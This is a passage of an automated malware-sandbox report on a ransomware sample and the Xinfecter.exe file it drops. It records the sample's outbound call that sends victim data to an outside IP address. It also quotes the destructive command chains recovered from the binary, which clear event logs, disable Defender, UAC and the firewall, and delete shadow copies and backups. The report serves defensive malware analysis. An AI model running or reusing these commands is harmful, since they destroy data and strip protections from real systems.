PVUlax8QSHrn6Hfdqvoc4HhNHWCa1LoktiVUBN+AXAY+HK+XjZZi6ymnJJLfb83O7H3jwjvG20utCDbTxl2A5vIFbeqqj2rbeB1UwYkc0j5ZihYECrVdA695TKEMT6qbrjmZQ7bwKBgHWwGOMjej1b7SHxbV8NRIB3Ep+kYxJPMcPnkDBmCz9zP7K8+IjK2ZVd8ZAnD0kkBQSJRMXQq9O5smE1g0/bz5g2wZHRH5OpmELQdU0g33IfLzXZ0Uc8vOD1QZvH1w+h0BSahH1cYFsC4kpBTfH1tD9ksvO0shcdEsSMpfGkgzMtAoGAcLEAs/CqO4hG4B7pcLOuU2YTOLg/U1tQtyrF5I0lQ9EMiuOxdZkA44g+vMl8p17tLns51QEzBWLCsA95xSJv4Z30klAgPa5YPDtdrozH7XpVyzFhMEXXpME74+zHuqMkK7bLls1wkPGc34QACsa2hppp80djuoHcNbMEJDDQ9EI=&INW15*7.999268(2)2,d5insomnia1441@gmail.com HTTP/1.1Host: 185.147.34.53Connection: close
      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
      Source: Joe Sandbox ViewIP Address: 185.147.34.53 185.147.34.53
      Source: Joe Sandbox ViewASN Name: HOSTSLIM-GLOBAL-NETWORKNL HOSTSLIM-GLOBAL-NETWORKNL
      Source: unknownDNS query: name: api.ipify.org
      Source: unknownDNS query: name: api.ipify.org
      Source: unknownTCP traffic detected without corresponding DNS query: 185.147.34.53
      Source: unknownTCP traffic detected without corresponding DNS query: 185.147.34.53
      Source: unknownTCP traffic detected without corresponding DNS query: 185.147.34.53
      Source: unknownTCP traffic detected without corresponding DNS query: 185.147.34.53
      Source: unknownTCP traffic detected without corresponding DNS query: 185.147.34.53
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009C6808 InternetReadFile,0_2_009C6808
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: text/*User-Agent: YourUserAgentHost: api.ipify.org
      Source: global trafficHTTP traffic detected: GET /110_And_Netword_Drive_Size:0_Encryption_Mode:_Fast_Mode!Empty]_____03/10/2023,_10:57:18$_06/12/2024-_7:51:[Version_10.0.19045.2006|Microsoft_Windows_10_Prohg3l,8.46.123.228~L8acq3ctygn4C5b6XsaUC8NQ4T5+jxiCsWkp7x/Hk8Cz2BBRGk0mufLQ+PUY1typcKrEwbK2Dj7BO9JOfDPuCfh3CsC3iPhAH2eScIc+GWLNXN+3hyXaq6j2YSWd5DmTTvK1Az6Y2HJdeT6zGl6i1w+ZGQLwGzy8RkS4oEtlW3UuJVLTmwGlR7YDbEAsKmRmfH7DPy5LzBAQywMQRipuvv+48axKwRXjo8jTBYqVPUjVsSEjhbXPLzM9Xl8KyCm8GT5vtwes3vLmsHwAGVQYt6Us2UTzSBdT9pgorDIbhDIj1Cwk35gD0LXznaGhiEJiInYLHVLDOXOWJKdNgqc46lWqA4wW0VuMf3EPOyqU5rpjqgp8qxSxJhTR/wcyQd2HbUZA16pPJXIZoJe2SIn/JT5eC9QAvRwM3UCi7ivb9fYZVrSlTF/thYWe80fZkyufyRCmdKQMuTBl9xsnavY9+hVq8Hy7mV1PPur7n4Wyf3wUh282zBNauAhJEyGreiPNkuZJ7x23lcM7XkLwGJb+Z4BlO6ZDi8aGpDuEQ8BIOqcf6mibsCw76IMfx9ChQBZaIs/VJIp1jERwD7V0DV/sfzVGP7doUDNiAsVwLAgERAoIBAANZ6J65BfEayvAoTqwqRhcFFqY07Esp26rpBoYFzh2iqppj+Qg1XNIc/Jmj0Yftn+AG2OhuMtx1EgFqSORxKm4bD4Bc+HC3ieUp23T40yyqEl7a4CbuZyrGUzpLTN+qK+wwVpPcL3Fiib71SbOTkZ1Cfflb3YPpD32a7G9NLQO4qsiKmwpC0NllcV8ej/lQSlji5ByZD6jQYAleNgPKm44Km75DSkIkh/BKY3Kp9/Ik/fCvaSh4vxRQdFUt4Jp4nTv+RBoGUGPYKktA5mJFUwaVBZvJbKQm9jcYthl29SqW5+KoBmKYDmnUwidST6jyaqC5WJD4FYRdPJlreKvOQKkCgYEAxNJeCd12amISe/f1l4spPEYmOngaEWyG+z89CH5Z9pncM7euMxJN7r+8f/bJcVQaASfNGyHaorGtJ7n/sh0BSY6exaa3xZxHwiJfDfOZRk11ABTE8g0AjXgxE230KEQ+eeg8uW7PhryGRtltV+Db4CPD+7AtFWw3VEEVBdb3/UcCgYEA3kygyXvm5a2jeQDrCOAsDxnN2DaCPwdeAEOelE74zS8GioFjrQ1iGiM6EEnHiieXszwskhhhAbQYDPNNXfSIH4PfaMPmT86RYcKkriGmEHPK8/DEMTnWjHnttHl5yDGlfEBPl3WZj3c5qLQ95XrGPtqnWo4z8sUjc0KOyG+ifR0CgYA544UR9deIs27ZKs/DKO4CqzhrjLxfekXRbPPVUlax8QSHrn6Hfdqvoc4HhNHWCa1LoktiVUBN+AXAY+HK+XjZZi6ymnJJLfb83O7H3jwjvG20utCDbTxl2A5vIFbeqqj2rbeB1UwYkc0j5ZihYECrVdA695TKEMT6qbrjmZQ7bwKBgHWwGOMjej1b7SHxbV8NRIB3Ep+kYxJPMcPnkDBmCz9zP7K8+IjK2ZVd8ZAnD0kkBQSJRMXQq9O5smE1g0/bz5g2wZHRH5OpmELQdU0g33IfLzXZ0Uc8vOD1QZvH1w+h0BSahH1cYFsC4kpBTfH1tD9ksvO0shcdEsSMpfGkgzMtAoGAcLEAs/CqO4hG4B7pcLOuU2YTOLg/U1tQtyrF5I0lQ9EMiuOxdZkA44g+vMl8p17tLns51QEzBWLCsA95xSJv4Z30klAgPa5YPDtdrozH7XpVyzFhMEXXpME74+zHuqMkK7bLls1wkPGc34QACsa2hppp80djuoHcNbMEJDDQ9EI=&INW15*7.999268(2)2,d5insomnia1441@gmail.com HTTP/1.1Host: 185.147.34.53Connection: close
      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
      Source: xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp, xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
      Source: xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000F97000.00000004.00000020.00020000.00000000.sdmp, xKvkNk9SXR.exe, 00000000.00000002.3296757158.0000000000988000.00000004.00000010.00020000.00000000.sdmp, xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp, xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
      Source: xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/C#O
      Source: xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/Y/O
      Source: xKvkNk9SXR.exe, Xinfecter.exe.0.drString found in binary or memory: https://www.coinbase.com/how-to-buy/bitcoin
      Source: xKvkNk9SXR.exe, Xinfecter.exe.0.drString found in binary or memory: https://www.kraken.com/learn/buy-bitcoin-btc

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Yara detected TrojanRansom
      Source: Yara matchFile source: Process Memory Space: xKvkNk9SXR.exe PID: 7032, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: Xinfecter.exe PID: 4148, type: MEMORYSTR
      Contains functionality to clear event logs
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"0_2_009D4049
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"0_2_009DC170
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"0_2_009DD08F
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"42_2_005C4049
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"42_2_005CBD00
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"42_2_005CD08F
      Deletes shadow drive data (may be related to ransomware)
      Source: xKvkNk9SXR.exeBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic
      Source: xKvkNk9SXR.exe, 00000000.00000003.2084365924.0000000000F69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: xKvkNk9SXR.exe, 00000000.00000003.2071935535.0000000000F6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: xKvkNk9SXR.exe, 00000000.00000003.2071935535.0000000000F6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: xKvkNk9SXR.exe, 00000000.00000000.2052899804.0000000000A93000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: xKvkNk9SXR.exe, 00000000.00000000.2052899804.0000000000A93000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: xKvkNk9SXR.exe, 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: xKvkNk9SXR.exe, 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000F3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin.exe Delete Shadows /A8
      Source: Xinfecter.exeBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic
      Source: Xinfecter.exe, 0000002A.00000002.2188876934.0000000000683000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: Xinfecter.exe, 0000002A.00000002.2188876934.0000000000683000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: Xinfecter.exe, 0000002A.00000000.2187029003.0000000000683000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: Xinfecter.exe, 0000002A.00000000.2187029003.0000000000683000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: xKvkNk9SXR.exeBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: xKvkNk9SXR.exeBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: S-6748.bat.0.drBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: Xinfecter.exe.0.drBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: Xinfecter.exe.0.drBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet

      System Summary

      barindex
      Windows Scripting host queries suspicious COM object (likely to drop second stage)
      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
      Writes or reads registry keys via WMI
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A3C860: CreateFileW,DeviceIoControl,CloseHandle,0_2_00A3C860
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile created: C:\Windows\SysMain.sysJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile created: C:\Windows\SysMain.sysJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009D40490_2_009D4049
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009DC1700_2_009DC170
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009C46700_2_009C4670
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009B92A00_2_009B92A0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009F00800_2_009F0080
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A181A00_2_00A181A0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A241100_2_00A24110
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A162EB0_2_00A162EB
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009FA2C00_2_009FA2C0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A442D40_2_00A442D4
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009C02390_2_009C0239
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009C82400_2_009C8240
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009C83800_2_009C8380
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A023C00_2_00A023C0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A184400_2_00A18440
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A1C7C50_2_00A1C7C5
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A167460_2_00A16746
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A248D00_2_00A248D0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009CE8300_2_009CE830
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A6E90D0_2_00A6E90D
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009B8A800_2_009B8A80
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009C6AF70_2_009C6AF7
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A46A580_2_00A46A58
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A80B040_2_00A80B04
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A24B700_2_00A24B70
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009F8E900_2_009F8E90
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009F0E000_2_009F0E00
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A48E4A0_2_00A48E4A
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A14FA70_2_00A14FA7
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A14FB40_2_00A14FB4
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A58FE00_2_00A58FE0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A1CF3F0_2_00A1CF3F
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009CAF500_2_009CAF50
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A012A00_2_00A012A0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A1D2C60_2_00A1D2C6
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A592520_2_00A59252
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A1533B0_2_00A1533B
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009F33000_2_009F3300
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009B53300_2_009B5330
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009F54000_2_009F5400
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A6B47B0_2_00A6B47B
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A635A30_2_00A635A3
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A3F5F00_2_00A3F5F0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A595C40_2_00A595C4
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009CF5700_2_009CF570
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A1D5570_2_00A1D557
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009F16300_2_009F1630
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A637D20_2_00A637D2
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A5B8170_2_00A5B817
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A238600_2_00A23860
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A5986E0_2_00A5986E
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A798790_2_00A79879
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A1D9900_2_00A1D990
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A299080_2_00A29908
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009C9ABA0_2_009C9ABA
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009BDAB00_2_009BDAB0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A43AE50_2_00A43AE5
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009C5AC00_2_009C5AC0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009CDAF00_2_009CDAF0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009BBA600_2_009BBA60
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A59B350_2_00A59B35
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A71B710_2_00A71B71
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A15C840_2_00A15C84
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A69CD00_2_00A69CD0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A23C700_2_00A23C70
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A59DF00_2_00A59DF0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A15EA80_2_00A15EA8
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009F3E800_2_009F3E80
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A67E460_2_00A67E46
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A17FA00_2_00A17FA0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005C404942_2_005C4049
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005B467042_2_005B4670
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005CBD0042_2_005CBD00
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005E008042_2_005E0080
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0061411042_2_00614110
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_006081A042_2_006081A0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005B824042_2_005B8240
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_006062EB42_2_006062EB
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005EA2C042_2_005EA2C0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_006342D442_2_006342D4
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005F23C042_2_005F23C0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005B838042_2_005B8380
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0060844042_2_00608440
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005B05AA42_2_005B05AA
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0060674642_2_00606746
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0060C7C542_2_0060C7C5
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005BE83042_2_005BE830
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_006148D042_2_006148D0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0065E90D42_2_0065E90D
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005B69E042_2_005B69E0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00636A5842_2_00636A58
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005A8A8042_2_005A8A80
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00614B7042_2_00614B70
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00670B0442_2_00670B04
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00638E4A42_2_00638E4A
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005E0E0042_2_005E0E00
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005E8E9042_2_005E8E90
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005BAF5042_2_005BAF50
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0060CF3F42_2_0060CF3F
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00648FE042_2_00648FE0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00604FA742_2_00604FA7
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00604FB442_2_00604FB4
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0064925242_2_00649252
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0060D2C642_2_0060D2C6
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005A92A042_2_005A92A0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005F12A042_2_005F12A0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0060533B42_2_0060533B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005E330042_2_005E3300
